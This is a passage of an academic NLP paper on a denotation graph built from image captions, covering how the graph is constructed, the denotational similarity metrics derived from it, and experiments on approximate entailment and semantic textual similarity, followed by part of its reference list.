shoes and a white hat” as an NP followed by a sin- gle PP, but “a man with red shoes and a white-haired woman” as two NPs, and to transform e.g. “stand- ing by a man and a woman” into “standing” and not “standing and a woman” when dropping the PP. Hypernym Lexicon We use our corpus and Word- Net to construct a hypernym lexicon that allows us to replace head nouns with more generic terms. We only consider hypernyms that occur themselves with sufficient frequency in the original captions (replac- ing “adult” with “person”, but not with “organ- ism”). Since the language in our corpus is very concrete, each noun tends to have a single sense, al- lowing us to always replace it with the same hyper- nyms.1 But since WordNet provides us with mul- tiple senses for most nouns, we first have to iden- tify which sense is used in our corpus. To do this, we use the heuristic cross-caption coreference algo- rithm of Hodosh et al. (2010) to identify coreferent NP chunks among the original five captions of each image.2 For each ambiguous head noun, we con- sider every non-singleton coreference chains it ap- pears in, and reduce its synsets to those that stand in a hypernym-hyponym relation with at least one other head noun in the chain. Finally, we apply a greedy majority voting algorithm to iteratively nar- row down each term’s senses to a single synset that is compatible with the largest number of coreference chains it occurs in. Caption Normalization In order to increase the recall of the denotations we capture, we drop all punctuation marks, and lemmatize nouns, verbs, and adjectives that end in “-ed” or “-ing” before gener- 1Descriptions of people that refer to both age and gen- der (e.g. “man”) can have multiple distinct hypernyms (“adult”/’“male”). Because our annotators never describe young children or babies as “persons”, we only allow terms that are likely to describe adults or teenagers (including occu- pations) to be replaced by the term “person”. This means that the term “girl” has two senses: a female child (the default) or a younger woman. We distinguish the two senses in a preprocess- ing step: if the other captions of the same image do not mention children, but refer to teenaged or adult women, we assign girl the woman-sense. Some nouns that end in -er (e.g. “diner”, “pitcher” also violate our monosemy assumption. 2Coreference resolution has also been used for word sense disambiguation by Preiss (2001) and Hu and Liu (2011). ating the denotation graph. In order to distinguish between frequently occurring homonyms where the noun is unrelated to the verb, we change all forms of the verb dress to dressed, all forms of the verb stand to standing and all forms of the verb park to park- ing. Finally, we drop sentence-initial there/here/this is/are (as in there is a dog splashing in the water), and normalize the expressions in X and dressed (up) in X (where X is an article of clothing or a color) to wear X. We reduce plural determiners to {two, three, some}, and drop singular determiners except for no. 4.1 Rule Templates The denotation graph contains a directed edge from s to s′ if there is a rule ω that reduces s′ to s, with an inverse ω−1 that expands s to s′. Reduction rules can drop optional material, extract simpler constituents, or perform lexical substitutions. Drop Pre-Nominal Modifiers: “red shirt” → “shirt” In an NP of the form “X Y Z”, where X and Y both modify the head Z, we only allow X and Y to be dropped separately if “X Z” and “Y Z” both occur elsewhere in the corpus. Since “white building” and “stone building” occur else- where in the corpus, we generate both “white build- ing” and “stone building” from the NP “white stone building”. But since “ice player” is not used, we replace “ice hockey player” only with “hockey player” (which does occur) and then “player”. Drop Other Modifiers “run quickly” → “run” We drop ADVP chunks and adverbs in VP chunks. We also allow a prepositional phrase (a preposi- tion followed by a possibly conjoined NP chunk) to be dropped if the preposition is locational (“in”, “on”, “above”, etc.), directional (“towards”, “through”, “across”, etc.), or instrumental (“by”, “for”, “with”). Similarly, we also allow the drop- ping of all “wear NP” constructions. Since the dis- tinction between particles and prepositions is often difficult, we also use a predefined list of phrasal verbs that commonly occur in our corpus to identify constructions such as “climb up a mountain”, which is transformed into “climb a mountain” or “walk down a street”, which is transformed into “walk”. Replace Nouns by Hypernyms: “red shirt” → “red clothing” We iteratively use our hypernym 70 GENERATEGRAPH(): Q, Captions, Rules ←∅ for all c ∈ ImageCorpus do Rules(c) ← GenerateRules(sc) pushAll(Q,{c}×RootNodes(sc, Rules(c))) while ¬empty(Q) do (c, s) ← pop(Q) Captions(s) ← Captions(s) ∪{c} if |Captions(s)| = 2 then for all c′ ∈ Captions(s) do pushAll(Q,{c′}×Children(s, Rules(c′))) else if |Captions(s)| > 2 then pushAll(Q,{c}×Children(s, Rules(c))) Figure 2: Generating the graph lexicon to make head nouns more generic. We only allow head nouns to be replaced by their hypernyms if any age based modifiers have already been re- moved: “toddler” can be replaced with “child”, but not “older toddler” with “older child”. Handle Partitive NPs: cup of tea → “cup”, “tea” In most partitive NP1-of-NP2 constructions (“cup of tea”, “a team of football players”) the correspond- ing entity can be referred to by both the first or the second NP. Exceptions include the phrase “body of water”, and expressions such as “a kind/type/sort of ”, which we treat similar to determiners. Handle VP1-to-VP2 Cases Depending on the first verb, we replace VPs of the form X to Y with both X and Y if X is a movement or posture (jump to catch, etc.). Otherwise we distinguish between cases we can only replace with X (wait to jump) and those we can only replace with Y (seem to jump). Extract Simpler Constituents Any noun phrase or verb phrase can also be used as a node in the graph and simplified further. We use the Malt de- pendencies (and the person terms in the entity type lexicon) to identify and extract subject-verb-object chunks which correspond to simpler sentences that we would otherwise not be able to obtain: from “man laugh(s) while drink(ing)”, we extract “man laugh” and “man drink”, and then further split those into “man”, “laugh(s)”, and “drink”. 4.2 Graph Generation The naive approach to graph generation would be to generate all possible strings for each caption. How- ever, this would produce far more strings than can be processed in a reasonable amount of time, and most of these strings would have uninformative denota- tions, consisting of only a single image. To make graph generation tractable, we use a top-down al- gorithm which generates the graph from the most generic (root) nodes, and stops at nodes that have a singleton denotation (Figure 2). We first identify the set of rules that can apply to each original caption (GenerateRules). These rules are then used to re- duce each caption as much as possible. The resulting (maximally generic) strings are added as root nodes to the graph (RootNodes), and added to the queue Q. Q keeps track of all currently possible node ex- pansions. It contains items 〈c,s〉, which pair the ID of an original caption and its image (c) with a string (s) that corresponds to an existing node in the graph and can be derived from c’s caption. When 〈c,s〉 is processed, we check how many captions have gen- erated s so far (Captions(s)). If s has more than a single caption, we use each of the applicable rewrite rules of c’s caption to create new strings s′ that cor- respond to the children of s in the graph, and push all resulting 〈c,s′〉 onto Q. If c is the second caption of s, we also use all of the applicable rewrite rules from the first caption c′ to create its children. A post-processing step (not shown in Figure 2) attaches each original caption to all leaf nodes of the graph to which it can be reduced. Finally, we obtain the denotation of each node s from the set of images whose captions are in Captions(s). 5 The Denotation Graph Size and Coverage On our corpus of 158,439 unique captions and 31,783 images, the denotation graph contains 1,749,097 captions, out of which 230,811 describe more than a single image. Ta- ble 1 provides the distribution of the size of deno- tations. It is perhaps surprising that the 161 cap- tions which describe each over 1,000 images do not just consist of nouns such as person, but also contain simple sentences such as woman standing, adult work, person walk street, or person play in- strument. Since the graph is derived from the origi- nal captions by very simple syntactic operations, the denotations it captures are most likely incomplete: Jsoccer playerK contains 251 images, Jplay soccerK contains 234 images, and Jsoccer gameK contains 71 Size of denotations |JsK| ≥ 1 |JsK| ≥ 2 |JsK| ≥ 5 |JsK| ≥ 10 |JsK| ≥ 100 |JsK| ≥ 1000 Nr. of captions 1,749,096 230,811 53,341 22,683 1,921 161 Table 1: Distribution of the size of denotations in our graph 119 images. We have not yet attempted to iden- tify variants in word order (“stick tongue out” vs. “stick out tongue”) or equivalent choices of prepo- sition (“look into mirror” vs. “look in mirror”). De- spite this brittleness, the current graph already gives us a large number of semantic associations. Denotational Similarities The following exam- ples of the similarities found by nPMI JK and PJK show that denotational similarities do not simply find topically related events, but instead find events that are related by entailment: PJK(x|y) x y 0.962 sit eat lunch 0.846 play guitar strum 0.811 surf catch wave 0.800 ride horse rope calf 0.700 listen sit in classroom If someone is eating lunch, it is likely that they are sitting, and people who sit in a classroom are likely to be listening to somebody. These entail- ments can be very precise: “walk up stair” entails “ascend”, but not “descend”; the reverse is true for “walk down stair”: PJK(x|y) x =ascend x =descend y =walk up stair 32.0 0.0 y =walk down stair 0.0 30.8 nPMI JK captures paraphrases as well as closely related events: people look in a mirror when shav- ing their face, and baseball players may try to tag someone who is sliding into base: nPMI JK x y 0.835 open present unwrap 0.826 lasso try to rope 0.791 get ready to kick run towards ball 0.785 try to tag slide into base 0.777 shave face look in mirror Comparing the expressions that are most similar to “play baseball” or “play football” according to the denotational nPMI JK and the compositional Σ similarities reveals that the denotational similarity finds a number of actions that are part of the partic- ular sport, while the compositional similarity finds events that are similar to playing baseball (football): play baseball nPMI JK Σ 0.674 tag him 0.859 play softball 0.637 hold bat 0.782 play game 0.616 try to tag 0.768 play ball 0.569 slide into base 0.741 play catch 0.516 pitch ball 0.739 play cricket play football nPMI JK Σ 0.623 tackle person 0.826 play game 0.597 hold football 0.817 play rugby 0.545 run down field 0.811 play soccer 0.519 wear white jersey 0.796 play on field 0.487 avoid 0.773 play ball 6 Task 1: Approximate Entailment A caption never provides a complete description of the depicted scene, but commonsense knowledge often allows us to draw implicit inferences: when somebody mentions a bride, it is quite likely that the picture shows a woman in a wedding dress; a pic- ture of a parent most likely also has a child or baby, etc. In order to compare the utility of denotational and distributional similarities for drawing these in- ferences, we apply them to an approximate entail- ment task, which is loosely modeled after the Rec- ognizing Textual Entailment problem (Dagan et al., 2006), and consists of deciding whether a brief cap- tion h (the hypothesis) can describe the same image as a set of captions P = {p1, ...,pN} known to de- scribe the same image (the premises). Data We generate positive and negative items 〈P,h,±〉 (Figure 3) as follows: Given an image, any subset of four of its captions form a set of premises. A hypothesis is either a short verb phrase or sentence that corresponds to a node in the deno- tation graph. By focusing on short hypotheses, we minimize the possibility that they contain extrane- ous details that cannot be inferred from the premises. Positive examples are generated by choosing a node h as hypothesis and an image i ∈ JhK such that ex- actly one caption of i generates h and the other four captions of i are not descendants of h and hence do not trivially entail h, giving an unfair advantage to denotational approaches. Negative examples are generated by choosing a node h as hypothesis and selecting four of the captions of an image i 6∈ JhK. 72 Premises: A woman with dark hair in bending, open mouthed, towards the back of a dark headed toddler’s head. A dark-haired woman has her mouth open and is hugging a little girl while sitting on a red blanket. A grown lady is snuggling on the couch with a young girl and the lady has a frightened look. A mom holding her child on a red sofa while they are both having fun. VP Hypothesis: make face Premises: A man editing a black and white photo at a computer with a pencil in his ear. A man in a white shirt is working at a computer. A guy in white t-shirt on a mac computer. A young main is using an Apple computer. S Hypothesis: man sit Figure 3: Positive examples from the Approximate Entailment tasks. Since our items are created automatically, a posi- tive hypothesis is not necessarily logically entailed by its premises. We have performed a small-scale human evaluation on 300 items (200 positive, 100 negative), each judged independently by the same three judges (inter-annotator agreement: Fleiss-κ = 0.74). Our results indicate that over half (55%) of the positive hypotheses can be inferred from their premises alone without looking at the original im- age, while almost none of the negative hypotheses (100% for sentences, 96% for verb phrases) can be inferred from their premises. The training items are generated from the captions of 25,000 images, and the test items are generated from a disjoint set of 3,000 images. The VP data set consists of 290,000 training items and 16,000 test items, while the S data set consists of 400,000 training items and 22,000 test items. Half of the items in each set are positive, and the other half are negative. Models All of our models are binary MaxEnt clas- sifiers, trained using MALLET (McCallum, 2002). We have two baseline models: a plain bag-of-words model (BOW) and a bag-of-words model where we add all hypernyms in our lexicon to the captions be- fore computing their overlap (BOW-H). This is in- tended to minimize the advantage the denotational features obtain from the hypernym lexicon used to construct the denotation graph. In both cases, a global BOW feature captures the fraction of tokens in the hypothesis that are contained in the premises. Word-specific BOW features capture the product of the frequencies of each word in h and P. All other models extend the BOW-H model. Denotational Similarity Features We compute denotational similarities nPMI JK and PJK (Sec- tion 2.4) over the pairs of nodes in a denotation graph that is restricted to the training images. We only consider pairs of nodes n,n′ if their denota- tions contain at least 10 images and their intersection contains at least 2 images. To map an item 〈P,h〉 to denotational simi- larity features, we represent the premises as the set of all nodes P that are ancestors of its cap- tions. A sentential hypothesis is represented as the set of nodes H = {hS,hsbj,hV P ,hv,hdobj} that correspond to the sentence (h itself), its sub- ject, its VP and its direct object. A VP hypothe- sis has only the nodes H = {hV P ,hv,hdobj}. In both cases, hdobj may be empty. Both of the de- notational similarities nPMI JK(h,p) and PJK(h|p) for h ∈ H, p ∈ P lead to two constituent- specific features, sumx and maxx, (e.g. sumsbj =∑ p sim(hsbj,p), maxdobj = maxp sim(hdobj,p)) and two global features sump,h = ∑ p,h sim(h,p) and maxp,h = maxp,h sim(h,p). Each constituent type also has a set of node-specific sumx,s and maxx,s features that are on when constituent x in h is equal to the string s and whose value is equal to the constituent-based feature. For PJK, each con- stituent (and each constituent-node pair) has an ad- ditional feature P(h|P) = 1 − ∏ n(1 −PJK(h|pn)) that estimates the probability that h is generated by some node in the premise. Lexical Similarity Features We use two sym- metric lexical similarities: standard cosine distance (cos), and Lin (1998)’s similarity (Lin): cos(w,w′) = w·w ′ ‖w‖‖w′‖ Lin(w,w′) = ∑ i:w(i)>0∧w′(i)>0 w(i)+w ′(i)∑ i w(i)+ ∑ i w ′(i) 73 We use two directed lexical similarities: Clarke (2009)’s similarity (Clk), and Szpektor and Dagan (2008)’s balanced precision (Bal), which builds on Lin and on Weeds and Weir (2003)’s similarity (W): Clk(w | w′) = ∑ i:w(i)>0∧w′(i)>0 min(w(i),w ′(i)) ∑ i w(i) Bal(w | w′) = √ W(w | w′) × Lin(w,w′) W(w | w′) = ∑ i:w(i)>0∧w′(i)>0 w(i)∑ i w(i) We also use two publicly available resources that provide precomputed similarities, Kotlerman et al. (2010)’s DIRECT noun and verb rules and Chklovski and Pantel (2004)’s VERBOCEAN rules. Both are motivated by the need for numerically quantifiable semantic inferences between predicates. We only use entries that correspond to single tokens (ignor- ing e.g. phrasal verbs). Each lexical similarity results in the follow- ing features: words in the output are represented by a max-simw feature which captures its max- imum similarity with any word in the premises (max-simw = maxw′∈P sim(w,w′)) and by a sum-simw feature which captures the sum of its sim- ilarities to the words in the premises (sum-simw =∑ w′∈P sim(w,w ′)). Global max sim and sum sim features capture the maximal (resp. total) similarity of any word in the hypothesis to the premise. We compute distributional and compositional similarities (cos, Lin, Bal, Clk, Σ, Π) on our im- age captions (“cap”), the BNC and Gigaword. For each corpus C, we map each word w that appears at least 10 times in C to a vector wC of the non- negative normalized pointwise mutual information scores (Section 2.4) of w and the 1,000 words (ex- cluding stop words) that occur in the most sentences of C. We generally define P(w) (and P(w,w′)) as the fraction of sentences in C in which w (and w′) occur. To allow a direct comparison between dis- tributional and denotational similarities, we first de- fine P(w) (and P(w,w′)) over individual captions (“cap”), and then, to level the playing field, we rede- fine P(w) (and P(w,w′)) as the fraction of images in whose captions w (and w′) occur (“img”), and then we use our lexicon to augment captions with all hypernyms (“+hyp”). Finally, we include BNC and Gigaword similarity features (“all”). VP task S task Baseline 1: BoW 58.7 71.2 Baseline 2: BoW-H 59.0 73.6 External 1: DIRECT 59.2 73.5 External 2: VerbOcean 60.8 74.0 Cap All Cap All Distributional cos 67.5 71.9 76.1 78.9 Distributional Lin 62.6 70.2 75.4 77.8 Distributional Bal 62.3 69.6 74.7 75.3 Distributional Clk 62.4 69.2 75.4 77.5 Compositional Π 68.4 70.3 75.3 77.3 Compositional Σ 67.8 71.4 76.9 79.2 Compositional Π, Σ 69.8 72.7 77.0 79.6 Denotational nPMI JK 74.9 80.2 Denotational PJK 73.8 79.5 nPMI JK, PJK 75.5 81.2 Combined cos, Π, Σ 71.1 72.6 77.4 79.2 nPMI JK, PJK, Π, Σ 75.6 75.9 80.2 80.7 nPMI JK, PJK, cos 75.6 75.7 80.2 81.2 nPMI JK, PJK, cos, Π, Σ 75.8 75.9 81.2 80.5 Table 2: Test accuracy on Approximate Entailment. Compositional Similarity Features We use two standard compositional baselines to combine the word vectors of a sentence into a single vector: ad- dition (s∑ = w1 + ... + wn, which can be inter- preted as a disjunctive operation), and element-wise (Hadamard) multiplication (s∏ = w1 � ... � wn, which can be seen as a conjunctive operation). In both cases, we represent the premises (which con- sist of four captions) as a the sum of each caption’s vector p = p1 + ...p4. This gives two composi- tional similarity features: Σ = cos(pΣ,hΣ), and Π = cos(pΠ,hΠ). 6.1 Experimental Results Table 2 provides the test accuracy of our mod- els on the VP and S tasks. Adding hypernyms (BOW-H) yields a slight improvement over the ba- sic BOW model. Among the external resources, VERBOCEAN is more beneficial than DIRECT, but neither help as much as in-domain distributional similarities (this may be due to sparsity). Table 2 shows only the simplest (“Cap”) and the most complex (“all”) distributional and com- positional models, but Table 3 provides accuracies of these models as we go from standard sentence- based co-occurrence counts towards more denota- tion graph-like co-occurrence counts that are based on all captions describing the same image (“Img”), 74 VP task S task Cap Img +Hyp All Cap Img +Hyp All cos 67.5 69.3 69.8 71.9 76.1 76.8 77.5 78.9 Lin 62.6 63.4 61.3 70.0 75.4 74.8 75.2 77.8 Bal 62.3 61.9 62.8 69.6 74.7 75.5 75.1 75.3 Clk 62.4 67.3 68.0 69.2 75.4 75.5 76.0 77.5 Π 68.4 70.5 70.5 70.3 75.3 76.6 77.1 77.3 Σ 67.8 71.4 71.6 71.4 76.9 78.1 79.1 79.2 Π, Σ 69.8 72.7 72.9 72.7 77.0 78.6 79.3 79.6 nPMI JK 74.9 80.2 PJK 73.8 79.5 nPMI JK, PJK 75.5 81.2 Table 3: Accuracy on hypotheses as various additions are made to the vector corpora. Cap is the image corpus with caption co-occurrence. Img is the image corpus with im- age co-occurrence. +Hyp augments the image corpus with hypernyms and uses image co-occurrence. All adds the BNC and Gigaword corpora to +Hyp. VP task S task Words in h 1 2 3+ 2 3 4+ % of items 72.8 13.9 13.3 65.3 22.8 11.9 BoW-H 52.0 75.0 80.1 69.1 80.8 84.4 cos (All) 68.8 79.4 81.1 75.9 83.9 85.7∑ (All) 68.1 80.8 79.5 76.5 83.9 85.1 nPMI JK 72.0 82.9 82.2 77.3 85.4 86.2 Table 4: Accuracy on hypotheses of varying length. include hypernyms (“+Hyp”), and add informa- tion from other corpora (“All”). The “+Hyp” col- umn in Table 3 shows that the denotational metrics clearly outperform any distributional metric when both have access to the same information. Al- though the distributional models benefit from the BNC and Gigaword-based similarities (“All”), their performance is still below that of the denotational models. Among the distributional model, the simple cos performs better than Lin, or the directed Clk and Bal similarities. In all cases, giving models access to different similarity features improves performance. Table 4 shows the results by hypothesis length. As the length of h increases, classifiers that use sim- ilarities between pairs of words (BOW-H and cos) continue to improve in performance relative to the classifiers that use similarities between phrases and sentences (Σ and nPMI JK). Most likely, this is due to the lexical similarities having a larger set of fea- tures to work with for longer h. nPMI JK does espe- cially well on shorter h, likely due to the shorter h having larger denotations. 7 Task 2: Semantic Textual Similarity To assess how the denotational similarities perform on a more established task and domain, we apply them to the 1500 sentence pairs from the MSR Video Description Corpus (Chen and Dolan, 2011) that were annotated for the SemEval 2012 Semantic Tex- tual Similarity (STS) task (Agirre et al., 2012). The goal of this task is to assign scores between 0 and 5 to a pair of sentences, where 5 indicates equivalence, and 0 unrelatedness. Since this is a symmetric task, we do not consider directed similarities. And be- cause the goal of this experiment is not to achieve the best possible performance on this task, but to compare the effectiveness of denotational and more established similarities, we only compare the impact of denotational similarities with compositional sim- ilarities computed on our own corpus. Since the MSR Video corpus associates each video with mul- tiple sentences, it is in principle also amenable to a denotational treatment, but the STS task description explicitly forbids its use. 7.1 Models Baseline and Compositional Features Our start- ing point is Bär et al. (2013)’s DKPro Similarity, one of the top-performing models from the 2012 STS shared task, which is available and easily mod- ified. It consists of a log-linear regression model trained on multiple text features (word and charac- ter n-grams, longest common substring and longest common subsequence, Gabrilovich and Markovitch (2007)’s Explicit Semantic Analysis, and Resnik (1995)’s WordNet-based similarity). We investigate the effects of adding compositional (computed on the vectors obtained from the image-caption train- ing data) and denotational similarity features to this state-of-the-art system. Denotational Features Since the STS task is symmetric, we only consider nPMI JK similari- ties. We again represent each sentence s by fea- tures based on 5 types of constituents: S = {sS,ssbj,sV P ,sv,sdobj}. Since sentences might be complex, they might contain multiple constituents of the same type, and we therefore think of each feature as a feature over sets of nodes. For each constituent C we consider two sets of nodes in the denotation graph: C itself (typically leaf nodes), 75 DKPro +Σ, Π (img) +nPMI JK +both Pearson r 0.868 0.880 0.888 0.890 Table 5: Performance on the STS MSRvid task: DKPro (Bär et al., 2013) plus compositional (Σ, Π) and/or deno- tational similarities (nPMI JK) from our corpus and Canc, their parents and grandparents. For each pair of sentences, C-C similarities compute the similarity of the constituents of the same type, while C-all similarities compute the similarity of a C constituent in one sentence against all con- stituents in the other sentence. For each pair of constituents we consider three similarity features: sim(C1,C2), max(sim(C1Canc2 ), sim(C anc 1 ,C2)), sim(Canc1 ,C anc 2 ). The similarity of two sets of nodes is determined by the maximal similarity of any pair of their elements: sim(C1,C2) = maxc1∈C1,c2∈C2 nPMI JK(c1,c2). This gives us 15 C-C features and 15 C-all features. 7.2 Experiments We use the STS 2012 train/test data, normalized in the same way as the image captions for the deno- tation graph (i.e. we re-tokenize, lemmatize, and remove determiners). Table 5 shows experimental results for four models: DKPro is the off-the-shelf DKProSimilarity model (Bär et al., 2013). From our corpus, we either add additive and multiplicative compositional features (Σ, Π) from Section 6 (img), the C-C and C-All denotational features based on nPMI JK, or both compositional and denotational features. Systems are evaluated by the Pearson cor- relation (r) of their predicted similarity scores to the human-annotated ones. We see that the denotational similarities outperform the compositional similari- ties, and that including compositional similarity fea- tures in addition to denotational similarity features has little effect. For additional comparison, the published numbers for the TakeLab Semantic Text Similarity System (Šarić et al., 2012), another top- performing model from the 2012 shared task, are r = 0.880 on this dataset. 8 Conclusion Summary of Contributions We have defined novel denotational metrics of linguistic similarity (Section 2), and have shown them to be at least competitive with, if not superior to, distributional similarities for two tasks that require simple se- mantic inferences (Sections 6, 7), even though our current method of computing them is somewhat brittle (Section 5). We have also introduced two new resources: a large data set of images paired with descriptive captions, and a denotation graph that pairs generalized versions of these captions with their visual denotations, i.e. the sets of im- ages they describe. Both of these resources are freely available (http://nlp.cs.illinois.edu/ Denotation.html) Although the aim of this paper is to show their utility for a purely linguistic task, we believe that they should also be of great interest for people who aim to build systems that automat- ically associate image with sentences that describe them (Farhadi et al., 2010; Kulkarni et al., 2011; Li et al., 2011; Yang et al., 2011; Mitchell et al., 2012; Kuznetsova et al., 2012; Gupta et al., 2012; Hodosh et al., 2013). Related Work and Resources We believe that the work reported in this paper has the potential to open up promising new research directions. There are other data sets that pair images or video with de- scriptive language, but we have not yet applied our approach to them. Chen and Dolan (2011)’s MSR Video Description Corpus (of which the STS data is a subset) is most similar to ours, but its curated part is significantly smaller. Instead of several in- dependent captions, Grubinger et al. (2006)’s IAPR TC-12 data set contains longer descriptions. Or- donez et al. (2011) harvested 1 million images and their user-generated captions from Flickr to create the SBU Captioned Photo Dataset. These captions tend to be less descriptive of the image. The de- notation graph is similar to Berant et al. (2012)’s ‘entailment graph’, but differs from it in two ways: first, entailment relations in the denotation graph are defined extensionally in terms of the images de- scribed by the expressions at each node, and sec- ond, nodes in Berant et al.’s entailment graph corre- spond to generic propositional templates (X treats Y ), whereas nodes in our denotation graph corre- spond to complete propositions (a dog runs). 76 Acknowledgements We gratefully acknowledge the support of the National Science Foundation under NSF awards 0803603 “INT2-Medium: Understanding the mean- ing of images”, 1053856 “CAREER: Bayesian Mod- els for Lexicalized Grammars”, and 1205627 “CI- P:Collaborative Research: Visual entailment data set and challenge for the Language and Vision Com- munity”, as well as via an NSF Graduate Research Fellowship to Alice Lai. References Eneko Agirre, Mona Diab, Daniel Cer, and Aitor Gonzalez-Agirre. 2012. SemEval-2012 task 6: a pilot on semantic textual similarity. In Proceedings of the First Joint Conference on Lexical and Computational Semantics - Volume 1: Proceedings of the main confer- ence and the shared task, and Volume 2: Proceedings of the Sixth International Workshop on Semantic Eval- uation, SemEval ’12, pages 385–393. Daniel Bär, Torsten Zesch, and Iryna Gurevych. 2013. DKPro Similarity: An Open Source Framework for Text Similarity. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguis- tics: System Demonstrations, pages 121–126, Sofia, Bulgaria, August. Jon Barwise and John Perry. 1980. Situations and atti- tudes. Journal of Philosophy, 78:668–691. Jonathan Berant, Ido Dagan, and Jacob Goldberger. 2012. Learning entailment relations by global graph structure optimization. Computational Linguistics, 38(1):73–111. Greg Carlson, 2005. The Encyclopedia of Language and Linguistics, chapter Generics, Habituals and Iteratives. Elsevier, 2nd edition. David Chen and William Dolan. 2011. Collecting highly parallel data for paraphrase evaluation. In Pro- ceedings of the 49th Annual Meeting of the Associa- tion for Computational Linguistics: Human Language Technologies, pages 190–200, Portland, Oregon, USA, June. Timothy Chklovski and Patrick Pantel. 2004. Verbo- cean: Mining the web for fine-grained semantic verb relations. In Proceedings of the 2004 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 33–40, Barcelona, Spain, July. Kenneth Ward Church and Patrick Hanks. 1990. Word association norms, mutual information, and lexicogra- phy. Computational Linguistics, 16(1):22–29. Daoud Clarke. 2009. Context-theoretic semantics for natural language: an overview. In Proceedings of the Workshop on Geometrical Models of Natural Lan- guage Semantics, pages 112–119, Athens, Greece, March. Ido Dagan, Oren Glickman, and Bernardo Magnini. 2006. The PASCAL Recognising Textual Entailment challenge. In Machine Learning Challenges, volume 3944 of Lecture Notes in Computer Science, pages 177–190. Springer. David Dowty, Robert Wall, and Stanley Peters. 1981. In- troduction to Montague Semantics. Reidel, Dordrecht. Ali Farhadi, Mohsen Hejrati, Mohammad Amin Sadeghi, Peter Young, Cyrus Rashtchian, Julia Hockenmaier, and David Forsyth. 2010. Every picture tells a story: Generating sentences from images. In Proceed- ings of the European Conference on Computer Vision (ECCV), Part IV, pages 15–29, Heraklion, Greece, September. Evgeniy Gabrilovich and Shaul Markovitch. 2007. Com- puting semantic relatedness using wikipedia-based ex- plicit semantic analysis. In Proceedings of the 20th international joint conference on Artifical intelligence, IJCAI’07, pages 1606–1611. Michael Grubinger, Paul Clough, Henning Müller, and Thomas Deselaers. 2006. The IAPR benchmark: A new evaluation resource for visual information sys- tems. In OntoImage 2006, Workshop on Language Resources for Content-based Image Retrieval during LREC 2006, pages 13–23, Genoa, Italy, May. Ankush Gupta, Yashaswi Verma, and C. Jawahar. 2012. Choosing linguistics over vision to describe images. In Proceedings of the Twenty-Sixth AAAI Conference on Artificial Intelligence, Toronto, Ontario, Canada, July. Zellig S Harris. 1954. Distributional structure. Word, 10:146–162. Micah Hodosh, Peter Young, Cyrus Rashtchian, and Julia Hockenmaier. 2010. Cross-caption coreference reso- lution for automatic image understanding. In Proceed- ings of the Fourteenth Conference on Computational Natural Language Learning, pages 162–171, Uppsala, Sweden, July. Micah Hodosh, Peter Young, and Julia Hockenmaier. 2013. Framing image description as a ranking task: Data, models and evaluation metrics. Journal of Arti- ficial Intelligence Research (JAIR), 47:853–899. Shangfeng Hu and Chengfei Liu. 2011. Incorporating coreference resolution into word sense disambigua- tion. In Alexander F. Gelbukh, editor, Computational Linguistics and Intelligent Text Processing, volume 6608 of Lecture Notes in Computer Science, pages 265–276. Springer Berlin Heidelberg. 77 Lili Kotlerman, Ido Dagan, Idan Szpektor, and Maayan Zhitomirsky-Geffet. 2010. Directional distributional similarity for lexical inference. Natural Language En- gineering, 16(4):359–389. Girish Kulkarni, Visruth Premraj, Sagnik Dhar, Siming Li, Yejin Choi, Alexander C. Berg, and Tamara L. Berg. 2011. Baby talk: Understanding and generat- ing simple image descriptions. In Proceedings of the 2011 IEEE Conference on Computer Vision and Pat- tern Recognition (CVPR), pages 1601–1608. Polina Kuznetsova, Vicente Ordonez, Alexander Berg, Tamara Berg, and Yejin Choi. 2012. Collective gener- ation of natural image descriptions. In Proceedings of the 50th Annual Meeting of the Association for Com- putational Linguistics (Volume 1: Long Papers), pages 359–368, Jeju Island, Korea, July. Siming Li, Girish Kulkarni, Tamara L. Berg, Alexan- der C. Berg, and Yejin Choi. 2011. Composing sim- ple image descriptions using web-scale n-grams. In Proceedings of the Fifteenth Conference on Compu- tational Natural Language Learning (CoNLL), pages 220–228, Portland, OR, USA, June. Dekang Lin. 1998. An information-theoretic defini- tion of similarity. In Proceedings of the Fifteenth In- ternational Conference on Machine Learning (ICML), pages 296–304, Madison, WI, USA, July. Bill MacCartney and Christopher D. Manning. 2008. Modeling semantic containment and exclusion in nat- ural language inference. In Proceedings of the 22nd International Conference on Computational Linguis- tics (Coling 2008), pages 521–528, Manchester, UK, August. Andrew Kachites McCallum. 2002. Mal- let: A machine learning for language toolkit. http://www.cs.umass.edu/ mccallum/mallet. Shachar Mirkin, Ido Dagan, and Eyal Shnarch. 2009. Evaluating the inferential utility of lexical-semantic resources. In Proceedings of the 12th Conference of the European Chapter of the ACL (EACL 2009), pages 558–566, Athens, Greece, March. Jeff Mitchell and Mirella Lapata. 2010. Composition in distributional models of semantics. Cognitive Science, 34(8):1388–1429. Margaret Mitchell, Jesse Dodge, Amit Goyal, Kota Ya- maguchi, Karl Stratos, Xufeng Han, Alyssa Mensch, Alex Berg, Tamara Berg, and Hal Daume III. 2012. Midge: Generating image descriptions from computer vision detections. In Proceedings of the 13th Confer- ence of the European Chapter of the Association for Computational Linguistics (EACL), pages 747–756, Avignon, France, April. Richard Montague. 1974. Formal philosophy: papers of Richard Montague. Yale University Press, New Haven. Edited by Richmond H. Thomason. Joakim Nivre, Johan Hall, and Jens Nilsson. 2006. Malt- parser: A data-driven parser-generator for dependency parsing. In Proceedings of the International Confer- ence on Language Resources and Evaluation (LREC), pages 2216–2219. Vicente Ordonez, Girish Kulkarni, and Tamara L. Berg. 2011. Im2text: Describing images using 1 million captioned photographs. In Advances in Neural Infor- mation Processing Systems 24, pages 1143–1151. Judita Preiss. 2001. Anaphora resolution with word sense disambiguation. In Proceedings of SENSEVAL- 2 Second International Workshop on Evaluating Word Sense Disambiguation Systems, pages 143–146, Toulouse, France, July. Philip Resnik. 1995. Using information content to evalu- ate semantic similarity in a taxonomy. In Proceedings of the 14th international joint conference on Artificial intelligence - Volume 1, IJCAI’95, pages 448–453. Idan Szpektor and Ido Dagan. 2008. Learning entailment rules for unary templates. In Proceedings of the 22nd International Conference on Computational Linguis- tics (Coling 2008), pages 849–856, Manchester, UK, August. Coling 2008 Organizing Committee. Frane Šarić, Goran Glavaš, Mladen Karan, Jan Šnajder, and Bojana Dalbelo Bašić. 2012. Takelab: Sys- tems for measuring semantic text similarity. In Pro- ceedings of the Sixth International Workshop on Se- mantic Evaluation (SemEval 2012), pages 441–448, Montréal, Canada, 7-8 June. Julie Weeds and David Weir. 2003. A general frame- work for distributional similarity. In Proceedings of the 2003 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 81–88. Yezhou 